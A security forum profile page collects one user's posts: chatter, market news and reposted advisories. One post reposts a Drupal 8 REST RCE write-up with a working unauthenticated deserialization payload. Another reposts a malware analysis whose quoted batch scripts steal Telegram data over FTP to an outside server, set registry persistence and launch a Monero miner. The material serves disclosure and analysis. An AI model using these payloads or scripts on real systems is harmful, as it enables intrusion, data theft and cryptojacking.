Jump to content

usrnm

Active Members
  • Posts

    75
  • Joined

  • Last visited

  • Days Won

    4

Everything posted by usrnm

  1. Era interesanta si adresa de mail cu care s-a inregistrat 😎
  2. carderi nu zic ca nu sunt, dar faza cu asasinii...v-a intrat un mit in cap, ca pe tor sunt asasini, satanisti, taxiuri negre, cica si Dan Spataru intra live cu Dolanescu din cand in cand. Realitatea e ca se invart doar copii curiosi si tepari p-acolo. Cate un dealer mai rasare si dispare, hitmeni d-astia care dau refresh la pagina din minut in minut sa vada daca le-au intrat mesaje de la clienti...🐼
  3. cioace d-astea inca mai functionau acum 7-8 ani 🤣
  4. sursa:https://www.ambionics.io/blog/drupal8-rce Once again, an RCE vulnerability emerges on Drupal's core. This time it is targeting Drupal 8's REST module, which is present, although disabled, by default. By making use of the patch provided by Drupal, we were able to build a working exploit; furthermore, we discovered that the immediate remediation proposed for the vulnerability was incomplete, which could lead to a false sense of security. We therefore decided to release our findings, along with an exploit POC. Analyzing the advisory Drupal's advisory is fairly clear about the culprit: the REST module, if enabled, allows for arbitrary code execution. Nevertheless, as we're going to see, the indication that PATCH or POST requests must be enabled is wrong. The RCE is triggerable through a GET request, and without any kind of authentication, even if POST/PATCH requests are disabled in the REST configuration. The recommandation to "not allow PUT/PATCH/POST requests to web services resources" is therefore incorrect, and does not protect from the vulnerability. Upgrading your Drupal, or disabling the REST module, is ATM the only solution. Standard REST behaviour... The /node/{id} API is enabled by default when the REST module is enabled. Drupal's REST documentation provides a simple example to edit a node: POST /drupal-8.6.9/node/1?_format=hal_json HTTP/1.1 Host: 192.168.56.101 Content-Type: application/hal+json Content-Length: 286 { "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/article" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" } } In this case, Drupal will create properties title, type, and body for a Node object. In effect, Drupal can json-deserialize any ContentEntityBase object. As expected, since we're not authenticated, the request fails. ... and unexpected behaviour Nevertheless, by changing POST to GET, and sending an invalid href value, like so: GET /drupal-8.6.9/node/3?_format=hal_json HTTP/1.1 Host: 192.168.56.101 Content-Type: application/hal+json Content-Length: 287 { "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" } } we obtain: HTTP/1.1 422 Unprocessable Entity {"message":"Type http:\/\/192.168.56.101\/drupal-8.6.9\/rest\/type\/node\/INVALID_VALUE does not correspond to an entity on this site."} This indicates that the data is processed even through unauthenticated GET requests. Analyzing the patch By diffing Drupal 8.6.9 and 8.6.10, we can see that in the REST module, FieldItemNormalizer now uses a new trait, SerializedColumnNormalizerTrait. This trait provides the checkForSerializedStrings() method, which in short raises an exception if a string is provided for a value that is stored as a serialized string. This indicates the exploitation vector fairly clearly: through a REST request, the attacker needs to send a serialized property. This property will later be unserialize()d, thing that can easily be exploited using tools such as PHPGGC. Another modified file gives indications as to which property can be used: LinkItem now uses unserialize($values['options'], ['allowed_classes' => FALSE]); instead of the standard unserialize($values['options']);. As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link. Triggering the unserialize() Having all these elements in mind, triggering an unserialize is fairly easy: GET /drupal-8.6.9/node/1?_format=hal_json HTTP/1.1 Host: 192.168.1.25 Content-Type: application/hal+json Content-Length: 642 { "link": [ { "value": "link", "options": "<SERIALIZED_CONTENT>" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } } Since Drupal 8 uses Guzzle, we can generate a payload using PHPGGC: $ ./phpggc guzzle/rce1 system id --json "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" We can now send the payload via GET: GET /drupal-8.6.9/node/1?_format=hal_json HTTP/1.1 Host: 192.168.1.25 Content-Type: application/hal+json Content-Length: 642 { "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } } To which Drupal responds: HTTP/1.1 200 OK Link: <...> X-Generator: Drupal 8 (https://www.drupal.org) X-Drupal-Cache: MISS Connection: close Content-Type: application/hal+json Content-Length: 9012 {...}uid=33(www-data) gid=33(www-data) groups=33(www-data) Note: Drupal caches responses: if you're in a testing environment, clear the cache. If not, try another node ID.
  5. Plus ca ii explica sarbului cum e cu tiganii pe la noi, cand la aia tiganii fac legea...daca nici sarbul nu stie cum arata un tigan...🐼
  6. Software Overview WordPress plugin Simple Social Buttons is a popular free and paid plugin that brings the ability to add social media sharing buttons on the sidebar, inline, above and below the content of the post, on photos, popups, fly-ins. The plugin has over 40,000+ active installations according to WordPress Plugin repository and over 500,000 downloads according to plugin vendor WPBrigade. Vulnerability Description Improper application design flow, chained with lack of permission check resulted in privilege escalation and unauthorized actions in WordPress installation allowing non-admin users, even subscriber user type to modify WordPress installation options from the wp_options table. As can be seen from the screenshot, a function would iterate through JSON object provided in the request and update all options with option_name from object key and option_value from a key value without checking whether the current user has permission to manage options or provided option_name belongs to that plugin. sursa:https://www.webarxsecurity.com/wordpress-plugin-simple-social-buttons/
  7. Pai am mers pe buna-credinta, il cred persoana serioasa si cu intentii bune 😁
  8. mai nasol daca erau cacareze mici si negre, alea au criptare avansata! Mergand pe ideea ca ai uitat ce ai pus la bilutele negre, cel mai simplu este sa resetezi camera si o reconfigurezi. mult mai simplu decat sa faci pe hackerul
  9. ii dati prea multa atentie, asta trebuie ignorat...
  10. Mereu am spus ca Telegram e de cacat..de fapt in afara de Signal, cam toate aplicatiile de genul asta sunt de cacat: articol complet The desktop version of the security and privacy-focused, end-to-end encrypted messaging app, Telegram, has been found leaking both users' private and public IP addresses by default during voice calls. With 200 million monthly active users as of March 2018, Telegram promotes itself as an ultra-secure instant messaging service that lets its users make end-to-end encrypted chat and voice call with other users over the Internet. Security researcher Dhiraj Mishra uncovered a vulnerability (CVE-2018-17780) in the official Desktop version of Telegram (tdesktop) for Windows, Mac, and Linux, and Telegram Messenger for Windows apps that was leaking users' IP addresses by default during voice calls due to its peer-to-peer (P2P) framework. To improve voice quality, Telegram by default uses a P2P framework for establishing a direct connection between the two users while initiating a voice call, exposing the IP addresses of the two participants. Telegram Calls Could Leak Your IP Address However, just like Telegram provides the 'Secret Chat' option for users who want their chats to be end-to-end encrypted, the company does offer an option called "Nobody," which users can enable to prevent their IP addresses from being exposed during voice calls. Enabling this feature will cause your Telegram voice calls to be routed through Telegram's servers, which will eventually decrease the audio quality of the call. However, Dhiraj found that this Nobody option is only available to mobile users, and not for Telegram for Desktop (tdesktop) and Telegram Messenger for Windows apps, revealing the location of all desktop users regardless of how careful they might be otherwise. To get an IP address of someone, all an attacker needs to do is initiate a call. As soon as the recipients pick a call, the flaw will reveal their IP address. Dhiraj reported his findings to the Telegram team, and the company patched the issue in both 1.3.17 beta and 1.4.0 versions of Telegram for Desktop by providing an option of setting your "P2P to Nobody/My Contacts." Users can enable the option by heading towards Settings → Private and Security → Voice Calls → Peer-To-Peer to Never or Nobody. Dhiraj was also awarded a €2,000 (about $2,300) bug bounty for finding and responsibly disclosing the issue to the company. Leaking of IP addresses for an app that's meant to be secured is a real concern and does serve as a reminder that you can't blindly depend on even the most secure and privacy-focused services.
  11. Multiple vulnerabilities have been discovered in the Google Android operating system (OS), the most severe of which could allow for remote code execution. Android is an operating system developed by Google for mobile devices, including, but not limited to, smartphones, tablets, and watches. Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution within the context of a privileged process. Depending on the privileges associated with this application, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights. Multiple vulnerabilities have been discovered in Google Android OS, the most severe of which could allow for remote code execution within the context of a privileged process. Details of these vulnerabilities are as follows: Multiple remote code execution vulnerabilities in Media Framework (CVE-2017-13228, CVE-2017-13230). An information disclosure vulnerability in Media Framework (CVE-2017-13232). An elevation of privilege vulnerability in Media Framework (CVE-2017-13231). Multiple denial of service vulnerabilities in Media Framework (CVE-2017-13230, CVE-2017-13233, CVE-2017-13234). An elevation of privilege vulnerability in System (CVE-2017-13236). An information disclosure vulnerability in HTC components (CVE-2017-13238). An elevation of privilege vulnerability in HTC components (CVE-2017-13247). Multiple elevation of privilege vulnerabilities in Kernel components (CVE-2017-15265, CVE-2015-9016, CVE-2017-17770). Multiple elevation of privilege vulnerabilities in NVIDIA components (CVE-2017-6279, CVE-2017-6258). Multiple remote code execution vulnerabilities in Qualcomm components (CVE-2017-15817, CVE-2017-17760). Multiple elevation of privilege vulnerabilities in Qualcomm components (CVE-2017-11041, CVE-2017-17767, CVE-2017-17765, CVE-2017-17762, CVE-2017-14884, CVE-2017-15829, CVE-2017-15820, CVE-2017-17764, CVE-2017-17761). A vulnerability in the Qualcomm closed-source components (CVE-2017-14910). Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution in the context of a privileged process. These vulnerabilities could be exploited through multiple methods such as email, web browsing, and MMS when processing media files. Depending on the privileges associated with the application, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights. Sursa: link
  12. Eu cred ca nu aveau 18 milioane, asa umfla astia "preturile", sa para arestarea mai pompoasa si sa isi justifice si ei resursele..acum vreo 2 saptamani citeam ca olandezii, sau nu mai stiu care, au dat jos un webstresser, erau niste pusti de 19 ani care se laudau pe Facebook de ce grozavie fac. Atat se umflau in pene, de parca au prins spioni rusi. Pe de alta parte, daca in hartii sunt trecuti 18 milioane, 2-3 tot au facut pe bune, era suficient sa isi vada de treaba, dar romanul lacom...
  13. shinjiru, cu toate ca prin review-uri multi se plang ca nu sunt foarte fiabili (nu am incercat, spun din auzite)
  14. S-ar putea sa avem cunostinte comune, doar ca nu mai stiam nimic de el de cativa ani, ca are companie de telefoane si e ok. Constantean?
  15. Italieni zgarciti...macar un sim puteau sa dea si ei ca nu ii durea mana, asa, ca gest...
  16. E o intrebare pe care mi-am pus-o si eu. Foarte multi au cumparat btc sau alte monede. (unii au facut si credite la banca, dar asta e o alta poveste...) Toti spun chestii de genul, ¨daca ii scoteam acum x timp as fi avut nu stiu ce castig¨, dar inca nu l-am intalnit si pe unul care sa spuna ca a scos de o ciorba cel putin (mancata si digerata deja, nu doar ipotetic).... Totul se invarte in jurul lui ¨daca¨....
  17. Sursa: https://securelist.com/zero-day-vulnerability-in-telegram/83800/ The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse. Launching an attack on Telegram Below is an account of how this vulnerability was exploited in Telegram: The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows: evil.js -> photo_high_re*U+202E*gnp.js Where *U+202E* is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js. The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file: When the user clicks on this file, the standard Windows security notification is displayed: Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched. Exploitation in the wild After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios. Remote control The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules. Attack flowchart At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol: With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled: When launched, it modifies startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment: Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian: The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below: Command (English translation) Function “Онлайн (“Online) Send list of files in directory to control bot. “Запус (“Launch) Launch executable file using Process.Start(). “Логгер (“Logger) Check if tor process is running, download logg.zip, unpack it, delete the archive and launch its content. “Скачать (“Download) Download file into its own directory. “Удалить (“Delete) Delete file from its own directory. “Распаковать (“Unpack) Unpack archive in its own directory using specified password. Убить (Kill) Terminate specified process using process.Kill() Скачат (Download) Same as ‘Download’ (see above), with different command parsing. Запуск (Launch) Same as ‘Launch’ (see above), with different command parsing. Удалить (Delete) Same as ‘Delete’ (see above), with different command parsing. Распаковать (Unpack) Same as ‘Unpack’ (see above), with different command parsing. Процессы (Processes) Send a list of commands running on target PC to control bot. An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user. Miners and more Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet. Scenario #1 Attack flowchart At the first stage of the attack, an SFX archive with a script is used that launches an executable file: Path=%temp%\adr Setup=%temp%\adr\run.exe Silent=1 Overwrite=2 This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this: As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security. Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive. nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator: taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path: We have seen several versions of this batch script, some of which have extra features: This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access: The attack flowchart is approximately as follows: We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware. The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents: All components named st*.exe are executable PE files converted in a similar way from batch scripts. The SFX script launches the component st1.exe: Path=%temp%/adress Setup=%temp%/adress/st1.exe Silent=1 Overwrite=2 st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry: reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f So the st2.exe file launches when system is booted next time: TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch chcp 1251 tskill telegram taskkill /IM telegram.exe #Terminates Telegram processes md %temp%\sss cd %temp%\sss #Creates a temporary directory “%temp%\adress\WinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%\sss\1.rar” “%appdata%\Telegram Desktop” #Packs the Telegram directory into a RAR archive TIMEOUT /T 60 /NOBREAK :begin ping -n 1 ya.ru |>nul find /i “TTL=” && (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier: @echo XXXXXXXX>command.txt @echo XXXXXXXX>>command.txt @echo binary>>command.txt @echo mput %temp%\sss\*.rar>>command.txt @echo quit>>command.txt ftp -s:command.txt -i free11.beget.com del command.txt attrib %temp%/adress +H attrib %temp%/adress\* +H On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims: Each dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos. Scenario #2 Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload: The payload is an SFX archive with the following script: svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed. The script contains the appropriate comments: The miner itself is launched as follows: WshShell.Run “csrs.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u XXXXXXXXX@yandex.ru -p x -dbg -1″ & cores, 0 The pool address is associated with the cryptocurrency Monero. On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:
  18. Asian shares sank on Friday, with Chinese equities on track for their worst day in two years, as fears of higher U.S. interest rates shredded global investor confidence. The Shanghai Composite Index tumbled 6.0 percent to its lowest since May 2017, and the blue chip CSI300 index dived as 6.1 percent. Both indexes were on track for their largest single-day losses since February 2016. Frank Benzimra, head of Asia equity strategy at Societe Generale in Hong Kong, said Chinese shares slid mostly because of the U.S. correction but he had some China-specific worries. He said he now is neutral on China equities “due to two concerns: valuations on China-consumer related industries and execution risks on deleveraging (more specifically financial deleveraging)”. Japan’s Nikkei shed 2.9 percent, en route for a weekly loss of 8.6 percent - its biggest since February 2016. MSCI’s broadest index of Asia-Pacific shares outside Japan dropped 2.2 percent to a two-month low. The index, which hit a record high on Jan. 29, was on track for its sixth straight day of losses and stood to fall 7.6 percent on the week. Mai multe: https://www.reuters.com/article/us-global-markets/asia-hit-by-wall-sts-tumble-china-stock-indexes-lose-6-percent-idUSKBN1FT01T?feedType=RSS&feedName=businessNews Din punctul meu de vedere, "ciudatenia" care s-a intamplat la bursa din SUA va avea un impact international mai mare in viitorul apropiat, dar nici sa o dam in paranoia...
  19. Someone just posted what experts say is the source code for a core component of the iPhone’s operating system on GitHub, which could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. The GitHub code is labeled “iBoot,” which is the part of iOS that is responsible for ensuring a trusted boot of the operating system. In other words, it’s the program that loads iOS, the very first process that runs when you turn on your iPhone. It loads and verifies the kernel is properly signed by Apple and then executes it—it’s like the iPhone’s BIOS. “This is the biggest leak in history,” Jonathan Levin, the author of a series of books on iOS and Mac OSX internals, told me in an online chat, referring to Apple's history. “It’s a huge deal.” Update, February 8, 08:27 a.m.: Apple filed a copyright takedown request with GitHub and forced the company to remove the code. Sursa: https://motherboard.vice.com/en_us/article/a34g9j/iphone-source-code-iboot-ios-leak
  20. si ce treaba are asta cu Wireless Pentesting? Macovei le are cu trasu' la masea, nu cu pentesting-ul
  21. Daca e "bazata" in Olanda, inseamna ca puntem sa ne bazam si noi pe ea?
  22. Tu chiar ti-ai etalat inteligenta acum, felicitari, treci la loc in banca! P.S (ca vad ca iti place cu P.S, suna cult probabil pentru tine... ): ai dreptate, p-aici se invart oameni slab pregatiti care nu sunt luati in seama de cei din jur, norocul nostru e cand mai apare unul ca tine sa ne lumineze!
×
×
  • Create New...